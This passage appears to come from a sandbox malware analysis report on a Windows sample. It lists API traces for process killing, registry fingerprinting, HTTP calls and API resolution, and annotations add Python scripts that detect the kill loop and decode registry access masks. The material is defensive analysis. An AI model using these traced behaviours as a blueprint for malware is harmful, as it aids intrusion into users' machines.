                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: A621FC75904218EBDB25DF51DC8CBEEB7B6BB48304F0041CAE50AA7294D7B49B84CF91
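The two CreateToolhelp32Snapshot / Process32First / Process32Next / OpenProcess / TerminateProcess listings above share Opcode ID d164d69e...: the same routine is present in the original image at 0x400000 and again in the unpacked region at 0x2450000. The argument values are the useful part. 0x00000002 passed to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, 0x128 (296) passed to Process32First/Next is sizeof(PROCESSENTRY32) for the ANSI 32-bit structure, and 0x00000001 passed to OpenProcess is PROCESS_TERMINATE, the minimum right TerminateProcess needs. OpenProcess alone is not a useful detection feature; OpenProcess requesting PROCESS_TERMINATE inside a Toolhelp32 walk, followed by TerminateProcess, is. The script below is an added example, not part of the Joe Sandbox report or the sample: it parses "APIs" lines in the format shown on this page (the line format is assumed from these listings), decodes the access mask, and flags the enumerate-and-terminate sequence. SAMPLE_TRACE is copied from the 0x400000 listing above; BENIGN_TRACE is a constructed negative control.

```python
import re
from typing import Dict, List, Optional, Union

Arg = Union[int, str]

# One entry of a Joe Sandbox "APIs" list, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
# Assumed format: API.MODULE(hex args...), ref: hex address. An argument may be '?'
# (unresolved) or a string the IDA plugin resolved; both are kept as strings.
TRACE_RE = re.compile(
    r"(?P<api>[\w?@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

TH32CS_SNAPPROCESS = 0x00000002    # Tlhelp32.h: dwFlags for a process snapshot
PROCESSENTRY32_SIZE = 0x128        # 296 bytes: ANSI PROCESSENTRY32 in a 32-bit process
PROCESS_TERMINATE = 0x00000001     # winnt.h
PROCESS_ACCESS_BITS = {            # winnt.h, the process rights that matter for triage
    0x00000001: "PROCESS_TERMINATE",
    0x00000002: "PROCESS_CREATE_THREAD",
    0x00000008: "PROCESS_VM_OPERATION",
    0x00000010: "PROCESS_VM_READ",
    0x00000020: "PROCESS_VM_WRITE",
    0x00000040: "PROCESS_DUP_HANDLE",
    0x00000400: "PROCESS_QUERY_INFORMATION",
    0x00001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}


def _to_arg(token: str) -> Arg:
    """Hex arguments become ints; '?' and resolved strings stay as they are."""
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_trace(text: str) -> List[Dict]:
    """Turn the report's API lines into {api, module, args, ref} records."""
    calls: List[Dict] = []
    for line in text.splitlines():
        m = TRACE_RE.search(line)
        if not m:
            continue
        tokens = [t.strip() for t in (m.group("args") or "").split(",") if t.strip()]
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [_to_arg(t) for t in tokens],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def decode_process_access(mask: int) -> List[str]:
    """Name every known bit in an OpenProcess dwDesiredAccess; unknown bits stay hex."""
    names = [name for bit, name in PROCESS_ACCESS_BITS.items() if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS_BITS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def find_kill_pattern(calls: List[Dict]) -> Optional[Dict]:
    """Process snapshot + Process32First/Next + OpenProcess(PROCESS_TERMINATE) + a later TerminateProcess."""
    snapshots = [c for c in calls if c["api"] == "CreateToolhelp32Snapshot"
                 and c["args"] and isinstance(c["args"][0], int)
                 and c["args"][0] & TH32CS_SNAPPROCESS]
    walks = [c for c in calls if c["api"] in ("Process32First", "Process32Next")]
    opens = [c for c in calls if c["api"] == "OpenProcess"
             and c["args"] and isinstance(c["args"][0], int)
             and c["args"][0] & PROCESS_TERMINATE]
    kills = [c for c in calls if c["api"] == "TerminateProcess"]
    if not (snapshots and walks and opens and kills):
        return None
    first_open = min(opens, key=lambda c: c["ref"])
    later_kills = [k for k in kills if k["ref"] > first_open["ref"]]
    if not later_kills:
        return None
    return {
        "snapshot_ref": snapshots[0]["ref"],
        "open_ref": first_open["ref"],
        "terminate_ref": later_kills[0]["ref"],
        "access": decode_process_access(first_open["args"][0]),
        "entry_size_ok": any(len(w["args"]) > 1 and w["args"][1] == PROCESSENTRY32_SIZE for w in walks),
    }


# Copied from the 0x400000 listing above (refs 004199C5..00419A88).
SAMPLE_TRACE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
• Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
• Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
• CloseHandle.KERNEL32(00000000), ref: 00419A79
• CloseHandle.KERNEL32(0040A056), ref: 00419A88
"""

# Constructed negative control: a process walk that only asks for
# PROCESS_QUERY_LIMITED_INFORMATION and never terminates anything.
BENIGN_TRACE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401000
• Process32First.KERNEL32(?,00000128), ref: 00401010
• OpenProcess.KERNEL32(00001000,00000000,?), ref: 00401020
• CloseHandle.KERNEL32(00000000), ref: 00401030
"""

if __name__ == "__main__":
    print(find_kill_pattern(parse_trace(SAMPLE_TRACE)))
    print(find_kill_pattern(parse_trace(BENIGN_TRACE)))
```

The ordering check on `ref` is deliberate: the addresses are code locations, not a runtime order, but in a single function a TerminateProcess at a higher address than the OpenProcess that produced its handle is what a kill loop looks like, and it keeps unrelated TerminateProcess(self) exits earlier in the same routine from scoring.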
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CC668,00000000,00020119,00000000), ref: 0041786D
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0450,00000000,00000000,?,000000FF), ref: 0041788E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3466090806-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467A9B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467AA2
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 02467AD4
                                            • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 02467AF5
                                            • RegCloseKey.ADVAPI32(00000000), ref: 02467AFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3225020163-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: cce48ebf3cbb60758c1fccd8b2527221629925c9bc30ab10dbbe4cc4eba6fa00
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: 94014F75E05305BBDB00DBE0ED49F6EB7B9EB48B05F104196FA0596291E7709A40CB92
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CC668,00000000,00020119,00417849), ref: 004178EB
                                            • RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                            • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: CurrentBuildNumber
                                            • API String ID: 3466090806-1022791448
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                            APIs
                                            • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                            • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                            • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID: >=A$>=A
                                            • API String ID: 1378416451-3536956848
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02457601
                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02457678
                                            • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 024576D4
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02457719
                                            • HeapFree.KERNEL32(00000000), ref: 02457720
                                              • Part of subcall function 024594F7: vsprintf_s.MSVCRT ref: 02459512
                                            • task.LIBCPMTD ref: 0245781C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                            • String ID:
                                            • API String ID: 700816787-0
                                            • Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction ID: dd083e18704c0a8ca89ab8c14acc60156345da64bf27a2ddb5518717f82d91ac
                                            • Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction Fuzzy Hash: 4C61FDB590416C9BDB24DB50CC94FE9B7B9BF44300F0081EAE689A6241DFB1ABC5CF91
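The RegOpenKeyExA calls in this report use two access masks. The three opens against root 0x80000002 (HKEY_LOCAL_MACHINE, refs 0041786D, 02467AD4 and 004178EB, the last of them followed by a RegQueryValueExA for CurrentBuildNumber) pass 0x00020119; the open against 0x80000001 (HKEY_CURRENT_USER, ref 02457601) and the open of an enumerated subkey handle (ref 0041860B) pass 0x00020019. 0x20019 is KEY_READ. The extra 0x100 bit in the HKLM opens is KEY_WOW64_64KEY, which tells a 32-bit process (this one is: 0x400000 image base, 296-byte PROCESSENTRY32) to read the native 64-bit view of HKLM\SOFTWARE instead of the Wow6432Node view that registry redirection would otherwise give it. On Windows, CurrentBuildNumber is a value of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion; the key-name pointer (009CC668) is not resolved in this report, so that path is an inference from the value name. The decoder below is an added example, not from Joe Sandbox or the sample. It takes the first and fourth RegOpenKeyExA arguments exactly as the report prints them; the constants come from the Windows SDK headers winreg.h and winnt.h and cover more masks than the three pairs on this page; REPORT_OPENS is constructed from the argument pairs in the listings above.

```python
from typing import List, Tuple

# winreg.h: predefined root handles as they appear in the hKey argument
ROOT_KEYS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# winnt.h: registry-specific rights, WOW64 view selectors and standard rights
KEY_QUERY_VALUE        = 0x00000001
KEY_SET_VALUE          = 0x00000002
KEY_CREATE_SUB_KEY     = 0x00000004
KEY_ENUMERATE_SUB_KEYS = 0x00000008
KEY_NOTIFY             = 0x00000010
KEY_CREATE_LINK        = 0x00000020
KEY_WOW64_64KEY        = 0x00000100
KEY_WOW64_32KEY        = 0x00000200
DELETE                 = 0x00010000
READ_CONTROL           = 0x00020000   # STANDARD_RIGHTS_READ and STANDARD_RIGHTS_WRITE are this same bit
WRITE_DAC              = 0x00040000
WRITE_OWNER            = 0x00080000

KEY_READ       = READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY   # 0x00020019
KEY_WRITE      = READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY                      # 0x00020006
KEY_ALL_ACCESS = 0x000F003F

SINGLE_BITS = {
    KEY_QUERY_VALUE: "KEY_QUERY_VALUE",
    KEY_SET_VALUE: "KEY_SET_VALUE",
    KEY_CREATE_SUB_KEY: "KEY_CREATE_SUB_KEY",
    KEY_ENUMERATE_SUB_KEYS: "KEY_ENUMERATE_SUB_KEYS",
    KEY_NOTIFY: "KEY_NOTIFY",
    KEY_CREATE_LINK: "KEY_CREATE_LINK",
    KEY_WOW64_64KEY: "KEY_WOW64_64KEY",
    KEY_WOW64_32KEY: "KEY_WOW64_32KEY",
    DELETE: "DELETE",
    READ_CONTROL: "READ_CONTROL",
    WRITE_DAC: "WRITE_DAC",
    WRITE_OWNER: "WRITE_OWNER",
}


def decode_sam_desired(mask: int) -> List[str]:
    """Name the composite right(s) first, then whatever single bits remain."""
    names: List[str] = []
    covered = 0
    if mask & KEY_ALL_ACCESS == KEY_ALL_ACCESS:
        names.append("KEY_ALL_ACCESS")
        covered = KEY_ALL_ACCESS
    else:
        for composite, name in ((KEY_READ, "KEY_READ"), (KEY_WRITE, "KEY_WRITE")):
            if mask & composite == composite:
                names.append(name)
                covered |= composite
    rest = mask & ~covered
    for bit, name in SINGLE_BITS.items():
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")   # bits this table does not know about
    return names


def decode_hkey(value: int) -> str:
    """A predefined root, or a handle produced by an earlier RegOpenKeyExA/RegEnumKeyExA."""
    if value in ROOT_KEYS:
        return ROOT_KEYS[value]
    # Joe Sandbox prints 00000000 when it could not resolve the handle value.
    return f"<handle 0x{value:08X}>"


def decode_reg_open(hkey_hex: str, sam_hex: str) -> Tuple[str, List[str]]:
    """Decode the 1st (hKey) and 4th (samDesired) RegOpenKeyExA arguments as printed."""
    return decode_hkey(int(hkey_hex, 16)), decode_sam_desired(int(sam_hex, 16))


# Constructed from the RegOpenKeyExA lines in this report.
REPORT_OPENS = [
    ("80000002", "00020119"),   # refs 0041786D, 02467AD4, 004178EB
    ("80000001", "00020019"),   # ref 02457601
    ("00000000", "00020019"),   # ref 0041860B, subkey of the handle RegEnumKeyExA walked
]

if __name__ == "__main__":
    for hkey, sam in REPORT_OPENS:
        root, rights = decode_reg_open(hkey, sam)
        print(f"{hkey} {sam} -> {root}, {'|'.join(rights)}")
```

Two practical notes. KEY_WOW64_64KEY only changes anything for keys that are redirected (chiefly HKLM\SOFTWARE); on HKCU it is a no-op for most paths, which is consistent with the sample only using it on the HKLM opens. And 0x000F003F appears elsewhere on this page as the fourth argument of RegQueryValueExA; that parameter is lpType, not an access mask, so the plugin's argument decoding there should not be read as KEY_ALL_ACCESS.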
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02456537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 02456598
                                              • Part of subcall function 02456537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 024565BA
                                              • Part of subcall function 02456537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024565EC
                                              • Part of subcall function 02456537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0245663C
                                              • Part of subcall function 02456537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02456676
                                              • Part of subcall function 02456537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02456688
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024657CF
                                            • lstrlen.KERNEL32(00000000), ref: 024657E6
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 0246581B
                                            • lstrlen.KERNEL32(00000000), ref: 0246583A
                                            • strtok.MSVCRT(00000000,?), ref: 02465855
                                            • lstrlen.KERNEL32(00000000), ref: 02465865
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID:
                                            • API String ID: 3532888709-0
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 024675C5
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,024677F4,004205C5), ref: 02467603
                                            • memset.MSVCRT ref: 02467651
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 024677A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID:
                                            • API String ID: 224852652-0
                                            APIs
                                            • memset.MSVCRT ref: 00414325
                                            • RegOpenKeyExA.ADVAPI32(80000001,009D0F28,00000000,00020119,?), ref: 00414344
                                            • RegQueryValueExA.ADVAPI32(?,009D0738,00000000,00000000,00000000,000000FF), ref: 00414368
                                            • RegCloseKey.ADVAPI32(?), ref: 00414372
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                            • lstrcatA.KERNEL32(?,009D1428), ref: 004143AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            APIs
                                            • memset.MSVCRT ref: 0246458C
                                            • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 024645AB
                                            • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 024645CF
                                            • RegCloseKey.ADVAPI32(?), ref: 024645D9
                                            • lstrcat.KERNEL32(?,00000000), ref: 024645FE
                                            • lstrcat.KERNEL32(?,006D6B68), ref: 02464612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            APIs
                                            • strtok_s.MSVCRT ref: 004137D8
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • strtok_s.MSVCRT ref: 00413921
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            • API ID: lstrcpystrtok_s$lstrlen
                                            • String ID:
                                            • API String ID: 3184129880-0
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 02459CD1
                                            • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 02459D12
                                            • InternetCloseHandle.WININET(00000000), ref: 02459D2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID:
                                            • API String ID: 3289985339-0
                                            APIs
                                            • __lock.LIBCMT ref: 0041B69A
                                              • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                              • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                              • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                            • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                              • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                            • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 2005412495-0
                                            APIs
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02469E58
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02469E71
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02469E89
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02469EA1
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02469EBA
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02469ED2
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02469EEA
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02469F03
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02469F1B
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02469F33
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02469F4C
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02469F64
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02469F7C
